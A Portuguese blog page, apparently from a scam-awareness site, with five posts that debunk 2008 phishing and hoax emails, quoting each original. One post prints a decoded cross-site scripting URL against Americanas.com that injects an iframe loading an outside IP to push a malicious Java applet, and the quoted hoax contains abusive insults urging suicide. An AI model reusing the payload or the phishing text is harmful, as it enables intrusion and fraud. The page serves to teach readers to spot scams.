• Segurança

    Saiba a verdade sobre o Caso Eloá

    Se aproveitando da miséria alheia e da infeliz curiosidade mórbida do ser humano por tragédias, a mensagem abaixo chega por e-mail se fazendo passar por uma notícia do jornal O Globo, com um link para download de video, sobre o caso da menina Eloá, de 15 anos, sequestrada, feita refém e assassinada pelo ex-namorado Lindemberg, com dois tiros à queima-roupa, dentro de sua própria casa, num conjunto habitacional de Santo André, Grande ABC de São Paulo.

    Obviamente a mensagem é falsa e remete o usuário para um link malicioso, encapsulado como um arquivo do tipo CPL – executável pelo Windows por se tratar de formato reconhecido como Configurações de Painel de Controle. Veja como é fácil identificar a balela e não cair nas próximas que sejam parecidas.

    1. O site do jornal O Globo não envia notícias, notas, matérias e principalmente vídeos, para seus usuários ou visitantes. Especialmente se você não pediu para receber esse tipo de coisa, não se cadastrou no site ou mesmo sequer conhece O Globo (pensa!).
    2. Apesar de ter retirado uma fração de texto de uma nota verdadeira, o remetente semi-analfabeto da mensagem em questão adicionou uma frase para dar o tom “dramático e curioso” do golpe, mas esqueceu de passar um corretor ortográfico e mandou um “… informações sigilosas afirmão …”. Pô, “informações sigilosas” sendo divulgadas já é difícil de engolir. Um vídeo feito num local que estava fechado e nem os policiais conseguiram entrar a tempo, já é difícil de engolir. Mas “afirmão” foi de doer, fala a verdade!
    3. O principal e sempre deixado propositalmente por último: o link. Esse é o culpado por tudo. O texto que sugere o download de um vídeo direciona para http://oglobo.whyza.net/Videos/Downloads/Caso%20Eloa. Como assim “whysa.net“? O Globo é da Globo.com. Além disso, ao baixar o arquivo, percebe-se que não é um formato de vídeo e tem o nome de “TimVideoMensagem.mpg__id90698.cpl“. O semi-analfabeto citado acima além de semi-analftabeto é preguiçoso, pois usou um arquivo já utilizado em outro golpe e nem fez questão de mudar o nome.

    O arquivo em questão foi identificado pelo antivirus Kaspersky Online como sendo um AdWare, not-a-virus:AdWare.Win32.Agent.gcf, um arquivo malicioso que expõe propaganda não solicitada em sua máquina e pode ser usado para direcionar usuários para sites onde o remetente possua algum tipo de parceria ou até mesmo para outros arquivos maliciosos que podem ser ainda mais prejudiciais ao seu computador.

    Mensagem original

    From: “O Globo – Noticias     < noticias@oglobo.com >” <noticias@oglobo.com>
    Date: 21 de outubro de 2008 8h32min32s GMT-02:00
    Subject: Fw: Fw: Saiba a verdade sobre o Caso Eloá
    Reply-To: noticias@oglobo.com

    Da Agência Estado.

    A morte da garota Eloá, de 15 anos, complicou ainda mais a situação criminal de Lindemberg Fernandes Alves, de 22 anos, o ex-namorado da jovem que a manteve em cárcere privado por 101 horas. Segundo o delegado Luiz Carlos dos Santos, seccional de Santo André, Alves seria autuado em flagrante por três tentativas de homicídio, mas, agora, responderá por homicídio doloso e duas tentativas de homicídio, além de cárcere privado e periclitação de vida. A morte cerebral de Eloá foi anunciada, a polícia diz ter certeza de que os tiros que mataram e feriram Nayara foram disparados pela arma calibre 32 de Alves.   Porem informações sigilosas afirmão que um policial do GATE usava munição verdadeira, este video mostra a hora em que o policial atira na direção de Lindemberg e acerta Eloá.

    Veja aqui tudo como aconteceu passo a passo.

    Mensagem recebida por e-mail em 21/10/2008

    Read More
  • Segurança

    Olha o nível de estresse que um TCC pode causar

    Essa mensagem chegou por e-mail, mas uma simples busca no Google vai mostrar que já foi replicada em diversos blogs e comunidades online. Trata-se de um suposto embate entre alunos de uma faculdade uma marca de café. Os alunos teriam solicitado um encontro com o pessoal de marketing da empresa e, por conta de uma resposta insatisfatória, enviaram uma réplica mal educada, recebendo depois uma tréplica no mesmo nível.

    Trata-se de uma mentira, um desses boatos que se espalham na rede como pragas, servindo apenas como piada – já que é inegavelmente engraçado – mas como não foi exposto como ficção, pode causar constrangimentos pessoais e prejuízos institucionais, tendo em vista que empresa e faculdade são citadas nominalmente, além de pessoas fictícias.

    A marca citada já se pronunciou negando que a resposta tenha existido e que o tal funcionário faça parte do quadro da empresa. Assim, a mensagem, que não possui nenhum tipo de vírus ou links, é classificada como um HOAX, um boato, sem nenhum malefício direto ao usuário que a recebe, apenas indiretos aos citados.

    Mensagem original

    OLHA O NÍVEL DE ESTRESSE QUE UM TCC PODE CAUSAR.

    Pedido dos Alunos do Mackenzie ao Café Pilão:
    Prezados Srs.,
    Gostaria de verificar a possibilidade da realização de uma entrevista com o responsável pela Área de Marketing a respeito do mercado de café tipo exportação no Brasil.
    Eu e meus colegas somos alunos do curso de Administração/Comércio Exterior da Universidade Mackenzie e temos como tema do trabalho de conclusão de curso a influência do selo ‘tipo exportação’ no consumo de café no Brasil.
    A idéia é estudarmos os efeitos do produto exportável no mercado doméstico e por isso selecionamos profissionais do mercado de café cuja opinião nos seria de algum valor. A entrevista seria agendada conforme a disponibilidade da sua empresa e não levaria mais do que 1h.
    Aguardo um retorno, e desde já agradeço.

    Resposta do Café Pilão:

    Agradecemos o seu contato e o seu interesse no nosso Café Pilão.
    Informamos que nós, do Café Pilão, possuíamos uma política para divulgação das informações sobre os nossos produtos e sobre a nossa empresa.
    Desta forma, disponibilizamos o site para que o estudante tenha acesso às informações sobre a marca do produto e a empresa, possíveis de serem divulgadas.
    Você poderá acessar nossa página pelo endereço: < http://www.cafepilao.com.br/
    Esperamos que você possa apreciar o site do Café Pilão, pois ele foi especialmente desenvolvido com todo carinho para você! Mais uma vez agradecemos o seu contato e colocamos o Serviço de Atendimento ao Consumidor a sua disposição.

    Um abraço, Gledes de Souza.
    Serviço de Atendimento ao Consumidor.

    Réplica dos alunos:

    Prezado Sr. Gledes de Souza,
    Somos alunos do último semestre do curso de  Administração/COMEX da Universidade Mackenzie.
    Embora o nosso curso seja meia-boca, Vsa. seja meia-boca e essa água suja que vocês chamam de café seja meia-boca, nós não o somos e a nossa paciência se esgotou.
    Como Vsa. não deve saber o que é stress, pois a sua existência medíocre não prevê a transposição de limites, prazos, etc, eu gostaria de, em poucas linhas, escrever que é muito foda ralarmos para pagar a facu, mantermos nossos empregos, tentarmos minimamente concluir os trabalhos que sempre deixamos atrasar e ainda termos que aturar respostas imbecis como a que Vsa. nos mandou.
    Para tentar fazê-lo perceber o quão estúpida foi a sua atitude, segue um silogismo bem didático, com a seqüência de raciocínio que o seu cérebro de amendoim deveria ter feito:

    1. A minha mensagem chegou por meio do site do Café Pilão, portanto eu tenho acesso à Internet
    2. A mensagem foi escrita, logo eu sei escrever
    3. Se eu sei escrever, muito provavelmente eu saiba ler
    4. Se eu sei ler, tenho acesso à Internet e acessei o site do Café Pilão p/escrever a mensagem, eu vi o que havia escrito lá
    5. Se eu me dei ao trabalho de escrever uma merda de mensagem para uma banca de idiotas do serviço de atendimento, é porque eu preciso de algo ALÉM do que está no site.

    Ficou claro?

    Portanto, meu amigo, eu penso sinceramente que pessoas como Vsa. deveriam ser esterilizadas ao nascer, pois assim pouparíamos as futuras gerações do convívio desgastante que hoje somos obrigados a manter, em nome dos direitos humanos e da civilidade.
    Por fim, segue um conselho e um pedido.
    O conselho é que Vsa. se mate o mais rápido possível, e o pedido é que, antes de se matar, você vá tomar no CÚ.

    Tréplica do Diretor de Marketing do Café Pilão

    Prezados Formandos:

    Como vocês já devem ter percebido, cometeram vários erros na sua solicitação, imperdoáveis em alunos que estão saindo dos bancos de uma universidade para o mercado de trabalho.

    Erro 1
    Vocês tentaram estabelecer contato com uma grande empresa usando o canal de comunicação errado, ou seja, o SAC, Serviço de Atendimento ao Consumidor.
    Se vocês já tivessem recebido a graça de um estágio numa empresa medianamente organizada, este fato, além de transformá-los em alvo de piada, jamais lhes renderia um emprego na alta administração, nem menos no telemarketing que é onde as empresas atendem idiotas iguais a vocês.

    Erro 2
    Vocês também revelaram grande amadorismo em fazer este tipo de contato por e-mail, como se em alguma empresa houvesse profissionais prontos para responder pedidos de filhinhos de papai que deixam os seus trabalhos de aula para a última hora, porque ficam fumando maconha, correndo atrás de gatinhas e torrando a grana da família nos botecos da vida.
    Existe um equipamento chamado telefone, que é atendido por uma profissional chamada telefonista.
    Aqui na Pilão, casualmente, a telefonista é uma diplomada em Administração pela Mackenzie, com ênfase em Comércio Exterior , que, por suas raízes, certamente abriria as portas para vocês.

    Erro 3
    O trabalho proposto por vocês é de uma inutilidade espantosa, uma prova de total incompetência para quem está obtendo um diploma de bacharel em administração.
    Na verdade, é uma pesquisa estúpida e imbecil, pois utiliza uma metodologia completamente errada – ‘entrevistas com profissionais do café ‘ para ‘estudar os efeitos do produto exportável no mercado doméstico’.
    Garotos, este tema já foi pesquisado há 10 anos atrás e não tem mais a mínima importância depois que Collor de Mello abriu as fronteiras do Brasil.
    Naquele tempo, aliás, os jovens, além de estudiosos, também eram politizados. Vocês já ouviram falar dos ‘caras pintadas’ ou acham que isso é apenas um apelido para palhaços como vocês?

    Espero, com esta resposta, estar contribuindo para a formação de vocês.
    Mas, se esta resposta não lhes servir como uma pequena lição, fiquem tranqüilos.
    Entrem novamente em nosso site e conheçam os nossos projetos sociais, destinados a recuperar jovens drogados, a fazer inclusão digital (ensina inclusive a usar a internet) e a tratar problemas sexuais em jovens estudantes.
    Ah, antes que esqueça, abriu uma oportunidade de estágio para formandos em Comércio Exterior aqui na empresa: na Namíbia.
    Sabemos que é no cú do mundo, mas como vocês merecem tomar no cú, é um bom lugar.

    Atenciosamente.

    Jairo Soares
    Diretor de Marketing

    Mensagem original recebida por e-mail em 26/09/2008

    * Colaboraram: Daniel Becher e Jess Carrasco

    Read More
  • Segurança

    Americanas.com – Voce foi sorteado

    A mensagem abaixo chegou por e-mail e foi muito esperta em vários pontos, tentando me convencer de que eu tinha realmente sido sorteado pelo site Americanas.com a ganhar uma TV de 42″ (um dos meus objetos de desejo), mas foi uma prima pobre e mal copiada de uma outra muito bem elaborada que já falamos aqui. E claro, os scammers sempre caem em algum erro e dá pra sacar a safadeza.

    1. Eu sou cliente do site, já comprei lá e tenho cadastro. Mas e quem não é? Você já comprou alguma coisa no site das Americanas.com? Se considera um comprador compulsivo? Sim, porque o site não iria selecionar alguém que comprou apenas um livro ou um cd com um ano de cadastro, não acha? É uma promoção, não rasgar dinheiro. Se não é cliente, nunca comprou, já descarte de primeira.
    2. Ah, ok, você é cliente cadastrado, compra regularmente e se acha elegível para ganhar uma TV. Notou que na mensagem não citaram seu nome? Até mesmo o seu e-mail está oculto!? Será que essa mensagem foi mesmo pra você? Acha que uma empresa como essa enviaria um e-mail tão importante assim, de forma que pudessa cair no anti-spam tão fácil? NOT!
    3. E será que foi mesmo o site que te enviou a mensagem? Já viu o remetente? clienteespecial@quatrocantos.com. O mais engraçado é que o tal site Quatro Cantos é famoso por ter uma seção parecida com o Balela.info, que indica scams. Curioso, não?
    4. Use a dica (curiosa, por sinal) constante no próprio e-mail: “Sempre confira se o link é para o site verdadeiro da Americanas.com“. Então, o link, né? NÃO É! Ao clicar você é direcionado para http://www.whoopzhookz.com/americanas.com/promocoes/ClienteEspecial/ e é solicitado o download de um arquivo Formulario.Americanas.exe. Um executável do Windows, contendo software malicioso e muito provavelmente um trojan.

    Mensagem original (screenshot)

    Balela das Americanas.com

    Mensagem original (texto)

    Você está entre os 10 e-mails sorteados da Promoção Cliente Especial.
    TV 42″ LCD (1920 X 1080 Pixels), Full HD, 2 Conexões HDMI e Double Window – 42LY3RF – LG

    Seu e-mail foi sorteado entre os milhares em nosso banco de dados e você foi selecionado para ganhar uma TV LCD! Apenas 10 e-mails foram sorteados, e desses 10, apenas 1 será o ganhador da Promoção Americanas Cliente Especial. Você está na reta final para ter uma TV LCD 42″, basta acessar nosso link clicando no botão Validar Email logo abaixo e confirmar seu nome e endereço

    ATENÇÃO: A Americanas.com não solicita dados como cartão de credito por e-mail.

    Sempre confira se o link é para o site verdadeiro da Americanas.com
    Nunca informe sua senha para terceiros.

    Seu e-mail precisa ser verificado por você caso deseje participar da promoção. Para isso basta clicar no botão Validar E-mail.
    Ap?s clicar,ser? exibida uma caixa de download,que ? o formul?rio para o cadastro,para visualiza-lo clique em Abrir/Executar.

    Mensagem recebida por e-mail em 26/08/2008

    Read More
  • Segurança

    Saiu resultado do Caso Isabella Nardoni – Pai Confessa. Video.

    Essa mensagem é muito mais um ataque de engenharia social que propriamente um phishing scam. Isso porque ele simula uma situação falsa, mas a imitação do serviço não foi bem feita, sequer se parece com o serviço de envio de vídeos por e-mail do Globo.com. De qualquer forma, ainda se considera um perigo por dois motivos fortes: 1. o Caso Isabella comoveu o país por se tratar de assassinato infantil; 2. o brasileiro é muito curioso e adora acompanhar casos como esse.

    O fato é que se trata de uma mentira e o e-mail é utilizado para instalar software malicioso no computador do usuário (sabe aquela história de que a curiosidade matou o gato? Se aplica bem aqui). Dicas de como identificar essas pragas?

    1. Quem te enviou tal vídeo? Não há identificação alguma de ter sido um amigo ou você mesmo ter solicitado (se fosse, lembraria, não é?).
    2. O “jeitão” do e-mail também denuncia. Olha a redação: “pai e madrasta são suspeitos. E confirmam ter …“. Ah, para, ô! Se confirmam, não são mais suspeitos, são réus confessos! E ainda “e” é termo de ligação nessa frase, não cabe um “.” antes dele (fora outros erros).
    3. O remetente do e-mail, dá um saque: GLOBO NOTICIAS <friends@care.ringo.com>. Preciso dizer mais alguma coisa sobre?
    4. Por fim, o link aponta para um arquivo executável (GloboNoticiasIsabella.exe) hospedado em um servidor gratuito (boxstr.com) sem relação alguma com a Globo. Ah! Esqueci de frisar bem que arquivo executável é roubada! Cilada!

    Mensagem original (screenshot)

    Flickr : Balela do Caso Isabella Nardoni

    Mensagem original (texto)

    Assunto: Saiu resultado do Caso Isabella Nardoni – Pai Confessa. Video.
    Data: Sat, 19 Apr 2008 15:33:35 -0700
    De: GLOBO NOTICIAS <friends@care.ringo.com>
    Ultima hora: 19/04/2008 18:45Caso Isabella Nardoni:

    Menina caiu do sexto andar de prédio em São Paulo; pai e madrasta são suspeitos.
    E confirmam ter jogado a criança veja o vídeo com o depoimento da confissão.

    Clique aqui para assistir:

    Download: 12s 128kbps

    Mensagem recebida por e-mail em 19/04/2008

    Read More
  • Segurança

    AMERICANAS.COM – Voce foi sorteado!

    Entre os vários tipos de Phishing Scam que existem, os que dão mais resultado são os que oferecem algum prêmio. O fato de oferecer algo caro e que seja um sonho de consumo da pessoa, um carro, celular, computador, TV de Plasma, o que seja, faz com que o destinatário fique cego e não perceba os truques presentes.

    Esse Scam é até muito bem feito, pois usa uma técnica diferente para direcionar o usuário ao endereço malicioso e applet java para instalar malware. Algo chamado Javascript Injection. O link possui uma instrução que invalida todo o restante, então, para os leigos, o link está corretamente direcionado para o site das Lojas Americanas. Outras dicas são:

    1. Você alguma vez comprou no site Americanas.com ou Submarino.com? Caso contrário, qualquer e-mail que chegue dizendo-se passar por um desses serviços é MENTIRA. Apague imediatamente.
    2. Não achou estranho você ser “sorteado” e nem mesmo o seu nome aparecer no e-mail? E como assim você precisa “validar seu e-mail”? Eles sabem quem é você, possuem seu endereço completo e seu telefone. Algum motivo para enviarem um e-mail?
    3. Note o link. Ele veio enorme e com muitos caracteres estranhos, não? Isso é uma tentativa de execução de javascript direto no seu navegador. Recebi 2 e-mails desses, mas só o segundo continha o código correto, o primeiro não fazia absolutamente nada, ou seja, os “hackers phodões” fizeram merda e erraram o código. A URL depois de decodificada fica assim:

      http://carrinho.americanas.com.br/portal/meuCadastro.portal?_nfpb=true& LoginControllerPortlet_actionOverride=<script>window.onload=function(){ with(document.body.style){border=”none”;margin=”0 0 0 0″};document.body.innerHTML='<iframe src=http://203.124.22.143/java/index.htm style=border:none;height:700;width:1000>’};document.title=’Americanas’ </script><textarea>

    4. Ao entrar no site que o e-mail tentava direcionar, abre-se uma tela pedindo solicitação para instalar um JAVA. Atenção! Um applet java possui os mesmos direitos de acesso ao seu computador que o usuário que o está executando, em sua maioria, o administrador. Isso é um perigo potencial e instalar essa solicitação é altamente desaconselhada. A tela exibida está abaixo.

    Mensagem original (screenshot)

    Flickr: Americanas.com Você foi Sorteado

    Tela que simula o site Americanas.com (screenshot)

    Flickr: Americanas.com Você foi Sorteado

    Mensagem original (texto)

    Você está entre os 10 e-mails sorteados da Promoção Cliente Especial. TV 42″ LCD (1920 X 1080 Pixels), Full HD, 2 Conexões HDMI e Double Window – 42LY3RF – LG

    Seu e-mail foi sorteado entre os milhares em nosso banco de dados e você foi selecionado para ganhar uma TV LCD! Apenas 10 e-mails foram sorteados, e desses 10, apenas 1 será o ganhador da Promoção Americanas Cliente Especial. Você está na reta final para ter uma TV LCD 42″, basta acessar nosso link clicando no botão Validar Email logo abaixo e confirmar seu nome e endereço

    ATENÇÃO: A Americanas.com não solicita dados como cartão de credito por e-mail.

    Sempre confira se o link é para o site verdadeiro da Americanas.com

    Nunca informe sua senha para terceiros.

    Seu e-mail precisa ser verificado por você caso deseje participar da promoção. Para isso basta clicar no botão Validar E-mail.

    Mensagem recebida por e-mail em 16/04/2008

    Read More